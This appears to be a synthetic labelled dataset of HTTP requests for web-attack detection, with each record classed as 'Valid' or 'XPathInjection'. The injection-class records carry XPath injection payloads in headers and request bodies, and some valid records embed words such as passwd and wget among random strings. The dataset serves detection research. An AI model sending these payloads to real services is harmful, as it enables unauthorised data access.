GET /eoF-k1FrapOnm@.html?dv7lIents2hoi=a&tn=4570377&.Z6Lv=19008070&oRda1ustzoi=4&6wSsVF2D@=aosb&riQ-4gl6like9=6209&unrhncsrh7n=h&7zipwemureool=+Zi1t2rkttl%2Fg&qvdVSd5-=o8wp-wry%3Fl%25leu+%3D9ecpro&.Om9H2oJa=esPayei9ignlh&VxcS9Gdelete6HK=i0x+update%40i8eam9sOPugeln&RPCyuselectg=ad&Bs=Mo4%28y&ieedasdav8oifk=eh HTTP/1.1
Host: 190.106.241.102:5
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: ecfnone-t;q=0.7
Cache-Control: no-store
Client-ip: 10.66.171.65
Cookie: ahlhast0eehe=5ofrresock_streamtL;angi=httoroetcEtw;dh6n0=21sxct t;l73dxaedhtzb=z64;wIusrMQK=6;ten0tnrEI=qdrls:
Cookie2: $Version="4"
Date: Wed, 14 Jan 09 13:49:24 CET
ETag: W/"ysFV2@WM0CqMD-G"
Expect: pi5ezqee
From: a0lewqe@txeohoo.be
If-Modified-Since: Sat, 10 Apr 10 03:48:49 CET
If-Unmodified-Since: Tue, 09 Mar 04 02:26:52 GMT
If-Match: "R75SLjRFLbsmZ414"
If-None-Match: *
If-Range: "wTU6OBOLnnOjHa04h0P8"
Max-Forwards: 891
MIME-Version: 8.2
Pragma: Aru7pcen='l'
Proxy-Authorization: Digest qop=ttetoa
Authorization: NTLM OTIyaWl2dDJyaG51ZGZjcmpuZHRyS3JkbzlFcHNDaGNBdGhkbUV5ZQ==
Range: -6,6265-
Referer: /r3spgw/reaeut/WIqndKf/unue4TlE.mp3
TE: chunked
Trailer: Upgrade
User-Agent: Mozilla/9.0 (Windows; U; WinNT 4.2; g9-di; rv:3.7.1) Gecko/95951117
UA-CPU: MIPS
UA-Disp: 711,789,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 163x254
Via: FTP/8.8 www.wbatcti.jpg:76, 4.5 254.107.73.65
Transfer-Encoding: compress
Upgrade: leln4g/2.4
Warning: 997 139.90.117.24 "bnqtnmr9rievi" 
X-Forwarded-For: 145.136.143.164
X-Serial-Number: 863262
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12481
Start - Id: 30881
class: Valid
GET /dsaJzLiBZU/lBbwbQ.0XTjaDrl3/-q/ehsakebiheSrpx.mdb? HTTP/1.1
Host: www.nmmal6hib1.de
Connection: adteagt
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=0
Client-ip: 64.11.189.106
Cookie: edt1o9git=00458283
Cookie2: $Version="3"
Date: Sat, 10 Jan 04 11:41:58 CET
ETag: W/"mZQLRy9L4QOy32inx"
Expect: 100-continue
From: cltoeaj@urnje.gov
If-Modified-Since: Thu, 22 Sep 05 12:47:02 GMT
If-Unmodified-Since: Mon, 01 Nov 04 03:59:28 GMT
If-Match: *
If-None-Match: "1Oi6dRHbeY3bjdq79XYf"
If-Range: Sat, 10 Nov 07 05:45:05 UTC
Max-Forwards: 91
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM dHhucnJzeWE2ek9yczFybmlycm9hZWVlb2E4YjI5T3FjdXZNbjByYWU=
Authorization: NTLM ZG5laDJobXJ1ZHJlZXJub29yOHJzbWR6YW8xM2hlaGE0c2llb2Vlcw==
Range: -4563
Referer: /Zw5deo/nson.jsp
TE: chunked,trailers,trailers
Trailer: Host
User-Agent: Mozilla/8.9 (compatible; Konqueror/6.7; Open BSD i386; yehfTrit)
UA-CPU: Sparc
UA-Disp: 072,6639,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 707x590
Via: HTTP/6.1 207.168.220.79
Transfer-Encoding: gzip
Upgrade: erta/3.6, csf/2.0, ene/5.0, 5rt/7.1
Warning: 189 www.mlol.css "aohnMtaeseT4szte" 
X-Forwarded-For: 203.84.246.133
X-Serial-Number: 0719551808086
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30881
Start - Id: 14234
class: Valid
GET /cyIee/e5anhow7fnAa/ivq-Ihu65tm/bnranemvmoca7ohu.tiff?6lGxno1=220880&Nrnashog=dStleb&axolym4hegihne=%26idmepegpga0Wel6et HTTP/1.0
Host: www.ton9idti.be
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.3, iso-8859-5, windows-874, koi8-r, iso-8859-7;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: a-awele;q=0.0, djuo0e2E-tshgsch
Cache-Control: no-store
Client-ip: 222.155.249.216
Cookie: EJNftpopenJ.BL=n;vgchut=etxeedgeradt5kumo;Rertcnioy=pqn9cgpwlaeLsalae
Cookie2: $Version="64"
Date: Sat, 02 Aug 08 21:46:04 GMT
ETag: W/"AeZN8RZMmoUH4hCBsnaF"
Expect: 100-continue
From: ytnpe@aitntig.fr
If-Modified-Since: Sun, 11 Apr 10 02:50:49 UTC
If-Unmodified-Since: Mon, 10 Jan 05 01:57:59 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 443
MIME-Version: 0.5
Pragma: ettmTg8=lhD
Proxy-Authorization: iAwt ytdeMtan=qbp5ee
Authorization: Digest realm
Range: -901847,5-685
Referer: /nfyl0iwa/e0hrof/esehb.cgi
TE: chunked;q=0.1,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 4.3; te-se; rv:8.4.8) Gecko/45198884
UA-CPU: MIPS
UA-Disp: 985,925,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 962x171
Via: HTTP/2.8 www.uEje6cd.jpg, 4.2 77.126.108.108
Transfer-Encoding: gzip
Upgrade: nemhde/8.2, tex32o/1.6, 6cPmot/5.9, eiypMx/6.4
Warning: 616 154.56.254.74 "ansu3dtaabmzoDoqtefe" 
X-Forwarded-For: 177.22.102.112
X-Serial-Number: 21052565504410930240
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14234
Start - Id: 1121
class: Valid
GET /8t3/rp5zeVxS1tL/gtrraur6evhoRbo7Iw2b/6l4YsystemQe2AyOVkz/izehr/4VtyU.Tzh/tdedqNeozaoidea/3R/fent/jHmsq/2kRFS9MFlbWmr-ak..sh?d5ap0utnh=wusicrLefshab&ssc5dOs=o-PQAHNVPG3-&hn5te2ztp=278056&pad0mcixtd2tfn=4756518589&urlaTiE=dy&eyUkuersblinb=atc4we&w1nxieccwqyfaf=efoum3a&eTenIsnoegrTtnh=5570&saiiazT=+histoo0r%7Eteo&aosfek=7e&z0T9ftoa2yo=5%5C%5CiifoFn&tooeO=3250013&tinvjo25nnpst=95V.&eitn=iof&esdoa=hhavingwhere HTTP/1.0
Host: 170.175.22.206
Connection: edrek
Accept: image/*, audio/x-wav;q=0.9
Accept-Charset: x-mac-ce, macintosh, koi8-r;q=0.1, iso-8859-1, macintosh
Accept-Encoding: identity, deflate, identity, deflate;q=0.2, identity
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 179.209.57.142
Cookie: moueiiT=3639;ra=785835;q4SgxUexecY7iHb=e=phpsamos ;body77dvV6=ijR
Cookie2: $Version="1"
Date: Mon, 17 Apr 06 04:38:18 CET
ETag: W/"BrnWe_tD.ul85FPfav"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Fri, 05 Sep 08 04:09:49 CET
If-Unmodified-Since: Fri, 29 May 09 01:42:59 GMT
If-Match: *
If-None-Match: "GOsXReGap-PUu5g"
If-Range: *
Max-Forwards: 9908
MIME-Version: 9.9
Pragma: osecm=renasht
Proxy-Authorization: 1roecw ynJns=ailepj5
Authorization: NTLM MXJ0aGljZWt3ekd0bHZycjNtcG50ZWVpbk5yQXN0ZW5hcWE=
Range: 634551-,48052-6687,-9
Referer: http://omI82y.fr/em3trub.wav
TE: gzip;q=0.8,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: pcOl/1.3.9.5.9
UA-CPU: PowerPC
UA-Disp: 504,2036,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 269x251
Via: FTP/0.0 www.siAi.png, 6.8 123.207.234.73, FTP/5.7 www.hheutys.css:20
Transfer-Encoding: compress
Upgrade: nwt/2.1, 9Anoe/4.1, tte/7.6, oIr/1.1, 0rasra/0.1
Warning: 737 144.157.19.107 "tuN5hTIzo9baaeA" 
X-Forwarded-For: 212.205.31.150
X-Serial-Number: 704934
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 1121
Start - Id: 24596
class: Valid
GET /naanoa/RiqolHek/nAyKFVvY2bn2st8wK-X/zg9VD5Mc/sz.IxavdDakA8YKiqoD.shtml?exnoan=454615409&eds5ooiwtilSl=rcp&homeFmN=re&KHlSpasswd6iMHU=7a2gsecn7co4Nn&5otma=egvQmA&evalK8XE@Rn_z=444407&gTcw=nHtrmin4e%28-e5%5Bo2fw+&tQ=01087834 HTTP/1.0
Host: www.whse.cz:80
Connection: oscIdyhe
Accept: application/*
Accept-Charset: windows-1257;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 144.153.248.99
Cookie: IezK=p3ss5apositionSh;XKwrdut=y7jeeao7e0rybi;slbmchCMztNe0=lEvNgNO
Cookie2: $Version="1"
Date: Wed, 16 Jul 08 23:55:24 UTC
ETag: W/"4dS.u20O0Z3P8h."
Expect: eeEemis
From: naao@dsGtaOrc0.net
If-Modified-Since: Thu, 15 Jan 04 07:48:21 GMT
If-Unmodified-Since: Wed, 29 Mar 06 21:50:59 UTC
If-Match: "4NC5sz4F47btA9BjY"
If-None-Match: "MN6Z1kcVdo4O2KoRV3Vz"
If-Range: "tsmZj5mWAtrO58C"
Max-Forwards: 5
MIME-Version: 8.0
Pragma: c8zI5='in3en'
Proxy-Authorization: Basic ZWhUTzpqaFF0bGQ=
Authorization: Digest qop=auth
Range: 5150-,581355-
Referer: http://rnekacB.fr/zerts/hslh2/eqwn/nhorfhl3.gif
TE: trailers,chunked,deflate;q=0.1
Trailer: If-Modified-Since
User-Agent: Mozilla/3.5 (compatible; Konqueror/0.1; Open BSD i386; A2eTsl5tr; hyeltpoo4)
UA-CPU: StrongARM
UA-Disp: 1118,7867,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 587x9500
Via: 2.9 www.gGdEjLh8.gif
Transfer-Encoding: nee3rt; s96e1=rOdrea
Upgrade: FNHpie/1.6, stqE/9.5, mlak/3.1
Warning: 152 www.ooridO.gif "UeeEwtsltb3wwa8sst8o" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 04810456
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24596
Start - Id: 35488
class: XPathInjection
GET /o3wLc_35kEOF/lGeEnXZcu0Cf/ntr/enfjradrto2DR/o150XLzBShX@2sK3/qWkksyuJphteds/4IY/cwhua22ittesorl/qU9CbMuTYR/rre/gWOJ85B.jsp? HTTP/1.0
Host: 189.109.134.140:80
Connection: close
Accept: */*
Accept-Charset: big5;q=0.7, x-mac-chinesesimp;q=0.9, shift_jis;q=0.0
Accept-Encoding: gzip, gzip;q=0.8, deflate
Accept-Language: thkaaS/nr/izj/child::node()[position()=26]  or 'ewxmi'  =    '
Cache-Control: min-fresh=581
Client-ip: 188.0.226.122
Cookie: Oisfaearc=758
Cookie2: $Version="243"
Date: Sat, 19 Mar 05 24:47:13 UTC
Expect: 100-continue
From: ndieiEa@ngsaiAn.org
If-Modified-Since: Fri, 19 Nov 04 16:31:50 GMT
If-Unmodified-Since: Sat, 12 Apr 08 21:18:33 CET
If-Match: "9-q8me392rIR0iDje-H"
If-None-Match: *
If-Range: "6vW.fJygu_h3NTrne"
Max-Forwards: 55
Pragma: ni=l
Authorization: Digest algorithm=wzb6te
Referer: /u35Do/6dsh/sTtfw/ldmoilT/8t9u.cgi
TE: chunked,deflate,trailers
User-Agent: ws' or     0s/e8usP/child::node()[processing-instruction()=84] or   'tvtamsoh'   =  '
Via: 2.3 www.pdrewerg.png
Transfer-Encoding: identity
Upgrade: tuw/2.0, qrIUi/5.7, rhT/1.6, Cniih/3.2

null

End - Id: 35488
Start - Id: 6675
class: Valid
POST /6YUrWeoAKeLWLV/a4ae/srenhc/Aiismumtjpouusoa/s2F4SM/rATWMFRzkDt9x/sHdorf/7aJC_1I_L64GgIA-EC.gif? HTTP/1.1
Content-Length: 102
Content-Language: rlbHmt,52
Content-Encoding: deflate
Content-Location: http://l3rl.biz/iefeou/nhmu/hhois5ah.jpg
Content-MD5: cWlnbDI4cnJhN2V1bml1NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 03 Jul 05 04:24:59 CET
Last-Modified: Thu, 26 Oct 06 14:33:02 CET
Host: www.eOOonh.fr
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 3.121.174.35
Cookie: Aoxterm3Ydiv=5
Cookie2: $Version="165"
Date: Sun, 12 Dec 04 06:24:02 GMT
ETag: "vYsxOSquYPtEQpUW"
Expect: 100-continue
From: R5anodt@eiRwb.com
If-Modified-Since: Sun, 13 Apr 08 20:16:36 CET
If-Unmodified-Since: Sun, 29 Aug 04 16:19:29 UTC
If-Match: "OIU4Z1pHo0F7dw39Va."
If-None-Match: "PadfirSYfyyYUnANxJS"
If-Range: Sat, 14 Oct 06 20:45:50 UTC
Max-Forwards: 5
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic NG1kanBpOmllSGVocmVp
Authorization: Basic Z3FlcjpFdWF0bG4=
Range: -70
Referer: http://wrwd.de/yhwr/apqs/tmNit7hs/Aer0ai/ueeoci.html
TE: gzip;q=0.4,trailers,trailers
Trailer: Accept-Language
User-Agent: mae83fryieazsl
UA-CPU: Sparc
UA-Disp: 6078,616,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 075x397
Via: HTTP/0.9 209.139.112.154, guxhhf/8.4 www.Hvlci8d.html:0
Transfer-Encoding: deflate
Upgrade: ouir/8.6, le8mS/3.9, uip/7.9, oinia/7.0, igMoc/1.2
Warning: 713 www.8inlfdnc.js "eao0a8Dsgeo" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.BuCR=n+xp_s0&nTfmslcmrwnchr=T@:oobject&aqdgtptt4gsr=r iiwFd&st=86227073&eidca=e&thnpdudaaonl=96

End - Id: 6675
Start - Id: 48542
class: XPathInjection
PUT /sabceoseedn/atPA6/eTqc.BDnuJwtSoKhJ804/@9DDypassthruoKSZPmOS5/uln8Soz29llkt6li/wokaI3ot9elg51hh/Hvsy.1VCL/3.EFiRkVcRl_I4GBQFU-/e2eGahdeili/bYKTJiHl8.tiff? HTTP/1.0
Content-Length: 104
Content-Language: eluhN
Content-Encoding: identity
Content-Location: /zade/pn8rZat.avi
Content-MD5: dHJubWNuaG9nc3dNYWY0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Nov 06 18:09:05 GMT
Last-Modified: Sat, 18 Jul 09 01:47:21 UTC
Host: 226.245.86.14
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: Ns9coxa-d4e;q=0.4
Cache-Control: min-fresh=438
Client-ip: 126.205.122.60
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="4"
Date: Wed, 03 Oct 07 13:34:12 CET
ETag: "GcXnmUBFxWJV.V3_q"
Expect: 100-continue
From: 5lotN@aerqwne.st
If-Modified-Since: Fri, 13 Oct 06 22:14:35 CET
If-Unmodified-Since: Fri, 12 Mar 04 01:55:35 CET
If-Match: *
If-None-Match: "UP1Ir5HsSq7x3YVl@X"
If-Range: Thu, 19 May 05 09:28:06 GMT
Max-Forwards: 86
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: rOl0ta 9ssa=Epiteonc
Authorization: NTLM cmVybnJuc3RkaWE2UGhzZ2llU3VoaG9sZWVhNmF1dWF0amc3b29uUmhlbmV0dTc=
Range: -3
Referer: http://yateu4.it/nutmg.fgf
TE: deflate;q=0.8,trailers,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: idfmaq8erivsteni
UA-CPU: StrongARM
UA-Disp: 8426,8051,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 429x1759
Via: 9.3 189.251.16.174, 7.0 52.194.128.111:54646, FTP/1.8 www.0onii.html
Transfer-Encoding: identity
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ElEaur2s=sa2f9nl'   or     path/child::node()[position()=N]   or  'ode' ='

End - Id: 48542
Start - Id: 21130
class: Valid
GET /t9@D/8tkw3ueQdwf/crornzuidthf/ieih0ne3naoeevd0roo/qmailE35rhttpYcL/yAsock_streamd5I/tdhhrd81cate5co/lfXvNyz/m5Aj5zb@D5kOevMYB5/e7ag@FX-J@ZO3xl3B/9RRK5ZY.gif?hn7eTetS2unoitz=967&n79Wur2Retc=ha&sve=laIaefeattwr&gg=sfR&9nulliWkm93winntrn=la&ycosl=ey%28&IxTiNenyoTG=ynta&dc=lytmst1laac8s&aist=hQ%40y03 HTTP/1.1
Host: 233.134.28.47
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: Eeshyl-UrsF;q=0.7, Lfn-l
Cache-Control: no-transform
Client-ip: 88.191.168.124
Cookie: ml94p=uasoiaonLda1azhil0;TanhiejuRnse0n=Eukhsjaw3
Cookie2: $Version="54"
Date: Mon, 11 Apr 05 08:53:49 GMT
ETag: "VR5Hc8RtYKkR9cBH"
Expect: tetnMsTh
From: idssoghm@tIhNr.de
If-Modified-Since: Tue, 12 Sep 06 08:43:49 GMT
If-Unmodified-Since: Tue, 24 Jan 06 04:20:23 CET
If-Match: "t-1.r5CkrPNr-_PKKEc"
If-None-Match: "DOXQZD664j1PGxhUeF"
If-Range: Sat, 28 May 05 12:53:50 GMT
Max-Forwards: 9
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://bu9stei.be/jpini/churmrxe.pdf
Authorization: Digest opaque="nretnehs"
Range: 08246-7
Referer: http://www.Moatkcme.de/o68svhft/juteyys5/dqsn/rtaiee/fikho9tn.exe
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/1.1 (compatible; fBEh; Open BSD i386; Hiirjoer)
UA-CPU: PowerPC
UA-Disp: 595,813,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 739x758
Via: ootei/6.5 www.cxutAa59.css, efDZ/2.3 www.0i47.jpg
Transfer-Encoding: deflate
Upgrade: euef/5.6, Nsa8t/7.8, upugmw/9.2, hans/3.6
Warning: 738 www.hBzo7et.htm "seMl" 
X-Forwarded-For: 3.73.105.34
X-Serial-Number: 0274722
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21130
Start - Id: 9841
class: Valid
GET /tWQYHA8jCWKo@QcxA3/lc/@x92WAMU1EmQjeV/mJv5B-.oisdsD/fEkROnph-.FjhT/nhnim/ei3HcV.js? HTTP/1.0
Host: www.erarm.net
Connection: shrEnyl
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eo1Jow-nere9no, o-tE;q=0.3, ko9-mymqseoO;q=0.7
Cache-Control: only-if-cached
Client-ip: 172.53.112.7
Cookie: tAdhwo=flall7paLu2(g;rdeluyeckaR=>hipndvi2=zo;am=70637;iaeifsctnait=kaCLlRTQ
Cookie2: $Version="34"
Date: Sat, 30 Aug 08 06:43:51 CET
ETag: W/"FEztyvw35iAewNuw"
Expect: Tiedr
From: eiuie74@cpahSn6aa.fr
If-Modified-Since: Wed, 20 Sep 06 02:11:25 UTC
If-Unmodified-Since: Sat, 25 Dec 04 01:48:12 GMT
If-Match: "fB_LKo1_oq6J@5S"
If-None-Match: "7qRxAzQz-Jx_1gNeuc"
If-Range: Fri, 15 Aug 08 08:45:51 UTC
Max-Forwards: 78
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic ZGEyY3JlOmJ3aWgw
Authorization: buh2 eiii=mwc5kif
Range: -820868
Referer: /3vaw/ep4e/KHtfa/nssrilde.php3
TE: chunked,deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.5 (Windows; U; WinNT 4.7; y5-id; rv:3.4.0) Gecko/28719041
UA-CPU: 68000
UA-Disp: 5687,034,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 803x940
Via: HTTP/5.8 209.27.163.59:87, HTTP/9.1 www.ka8t0E.png, 4.0 214.201.139.152
Transfer-Encoding: deflate
Upgrade: apYvoi/7.8, geeoh/4.9, eity/4.7, d3ue/6.8
Warning: 359 www.omvimkcn.html "tdHnehjio" 
X-Forwarded-For: 12.7.147.127
X-Serial-Number: 09946739061718
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9841
Start - Id: 11630
class: Valid
GET /jnR2WfG1uisDdrop2-.php?wbin@mochaKCb=6ie1eno&cunrkdKtllunro=tUL6X HTTP/1.1
Host: 246.221.168.24
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 130.128.37.7
Cookie: pedp2odmhljs=tihRt5elhoehjiZk;DK8Y=bodyngt+ysedea;YWFM=@Z$https(;rto=025911
Cookie2: $Version="9"
Date: Sat, 21 May 05 08:14:27 CET
ETag: W/"2q_cYY2SmDS7HSANGw4"
Expect: 100-continue
From: llde@xop7tnntt.de
If-Modified-Since: Mon, 12 Oct 09 20:44:42 CET
If-Unmodified-Since: Fri, 06 Feb 04 07:58:44 GMT
If-Match: "_x.7tzOQ@FANDRt8"
If-None-Match: *
If-Range: Fri, 09 May 08 16:34:54 UTC
Max-Forwards: 563
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM YWViczBoc2F5cFVvaWxidGl1ZWVpYW9yYW5la2lpZW9ra2FscGk=
Authorization: Basic YXd5aHc6ZXQydHQ=
Range: 265882-,79-,501141-
Referer: http://www.23x5.cz/IevU/0ezemm.nsf
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: xbm1JWY http://www.oeripe.be
UA-CPU: MIPS
UA-Disp: 3478,401,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3585x2586
Via: FTP/7.9 115.66.35.245, 4.9 www.mi2r7i.jpeg
Transfer-Encoding: compress
Upgrade: Hsoeo/0.1, t4K/8.3, iwhfu/8.2
Warning: 857 www.weac.gif "Cdlyhd" 
X-Forwarded-For: 1.197.88.127
X-Serial-Number: 046539438868930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11630
Start - Id: 751
class: Valid
GET /queed/om8EMF5BeEt8jClfAcr8/Qem8lujryanlsrpsrt.exe?saoceTedyyivhp=hAOK&yKkBq5Wstdinwget=4&hheaalaewol=ntgac&V4UQobqOW2Q=ph6cq%5CaMps3+eodo&DQ-l3JvZ=wuYiauinputd&dunh=wOknjEg&earbefmeYt0=ietenlltSyha&snhl2ezOis0essd=%5B30%26de%29nii3sro&beqoo=9&rifextuesEitp=608404&bAH3Y_=17259 HTTP/1.1
Host: 233.213.165.47
Connection: keep-alive
Accept: image/png
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity, gzip;q=0.0
Accept-Language: *;q=0.8
Cache-Control: min-fresh=14874
Client-ip: 166.162.244.195
Cookie: c4pm2k=e7AszodtSar2edv;HBWhtacceslsP6v=eee;oeoiatkd=mw~n;be=weN=-ae?
Cookie2: $Version="12"
Date: Sun, 27 Aug 06 17:57:15 CET
ETag: W/"fXMN5N_--jgi3QqbOef"
Expect: ullec8ii=asBEe
From: eet5ayi@trifo.it
If-Modified-Since: Thu, 22 Jun 06 04:54:09 UTC
If-Unmodified-Since: Sun, 06 Jul 08 09:57:36 CET
If-Match: "_YOi@DSbdnmU6dRuZch"
If-None-Match: "j9fck@8JGQtLcRLPjvYh"
If-Range: "u95pHrYPtdzJg_gSb"
Max-Forwards: 770
MIME-Version: 2.4
Pragma: T=ydoase
Proxy-Authorization: 9eT6pJ noloyso=splar
Authorization: Basic b2VxdDM6MHF0c2dk
Range: 74705-710
Referer: /e11n/i4aogh.php
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: s9qOp-O http://www.edbn.st
UA-CPU: PowerPC
UA-Disp: 4382,1693,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 294x7034
Via: 4.0 www.i1cn.png
Transfer-Encoding: deflate
Upgrade: sNnb/0.0, sioc/7.0, inmmI/4.9, btat/9.8
Warning: 228 194.43.243.100 "i6jamotratateptotni" "Wed, 18 May 05 23:53:22 CET"
X-Forwarded-For: 126.215.82.178
X-Serial-Number: 93643715555060287385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 751
Start - Id: 29988
class: Valid
GET /oYQ/A2SglikeQJ4MGVCwinntEx/sRHrNt3TXI0vZWyrZ/m0IFUTUwE/no7hp/cdn1JBm2F8passwdsiT/ioteaw1ean7o67em/kdLgk3e/6tlfOIeonsopehytl/spx0dfmawsr8sEf4orlj/uy.asmx?ma5lrleh=zo%7Ea&u7orc7tn=9418600624&atetnlacepnhe=ooe+i&arroeKld2eyw=2671039093&i6cah5nrevE=1 HTTP/1.0
Host: 13.49.1.88
Connection: close
Accept: text/xml;q=0.5, application/rtf;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 26.168.29.0
Cookie: dropHQxGkE6=734477
Cookie2: $Version="6"
Date: Thu, 11 Sep 08 09:11:13 CET
ETag: W/"fnhW4l9xoRI1Yd0oZJ"
Expect: oAlen
From: h2entn@Tho3eeri.com
If-Modified-Since: Mon, 26 Sep 05 05:55:16 CET
If-Unmodified-Since: Wed, 11 Feb 09 11:48:09 CET
If-Match: "XRl-vZql9Um0Wi4v"
If-None-Match: *
If-Range: *
Max-Forwards: 0715
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: rrrf natgEri=u7aTNgi8
Authorization: cardD hetpfto=MnI4aa
Range: 89712-
Referer: /nrau/o0ta.txt
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.2 (Windows; U; Windows NT 4.8; hs-e2; rv:5.8.2) Gecko/58980842
UA-CPU: PowerPC
UA-Disp: 644,8528,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 219x466
Via: FTP/1.8 61.232.159.104, msc/5.6 www.eotaeA.png, 3.6 143.42.8.238
Transfer-Encoding: identity
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 69.246.154.213
X-Serial-Number: 2857393
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29988
Start - Id: 8994
class: Valid
GET /snnolirob/xepehnce/rtDf4HrOT47E/pi9useo9e/Z69/iTeR@9Z88access_log73.css?htiemepsvtm=sCpsh%28&ag6i7=%5DS%40dI7%7Eid5rwui%3D4&fhqetYrwdo=nv+system&FMgryHbY0aZ=0&egncRTe=4lln&6sEgtcreoarAT=s3oxMfHQ&vtehlrurirn=eTRzC8u&-M9dUN8a5B=ixedOiurejcDsptpzg&foL-Du7BjB=50850752&olrrEtR1ajtef=8739 HTTP/1.1
Host: 89.2.46.161
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-hebrew;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: y7m-3Gt, tigtrma-zuoad;q=0.5, 2-OnH4M, iieiaiy-fciol;q=0.9, fhntceod-oyert;q=0.2
Cache-Control: no-transform
Client-ip: 89.96.201.213
Cookie: 40jsys=dOpm0IGFl48;aEaolzfciwu= l;whem=z_H_9ECvw@PE
Cookie2: $Version="7"
Date: Fri, 24 Feb 06 19:01:07 UTC
ETag: W/"tITEZe2a@b90OdzSpI@"
Expect: sniir=cesco
From: lstucdNi@eei2smta.net
If-Modified-Since: Fri, 16 Mar 07 11:34:46 CET
If-Unmodified-Since: Wed, 08 Mar 06 21:22:13 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Jun 06 07:44:23 UTC
Max-Forwards: 58
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: lsSh2 t9tteeo=y7a2ree
Authorization: NTLM YmdVTG9pdGFpdjhyY29UY2xlc2dIMjlsNGhlcmhvZWl0YVY5dGhpMHJtY25IbVI=
Range: -3579
Referer: /fbWyQrd.sh
TE: trailers
Trailer: Trailer
User-Agent: mne5rre/3.8.7
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7350x9086
Via: 9.9 237.84.219.79
Transfer-Encoding: deflate
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 247 www.nekn6rAe.htm "a78cpakr" "Tue, 30 Jan 07 10:22:39 CET"
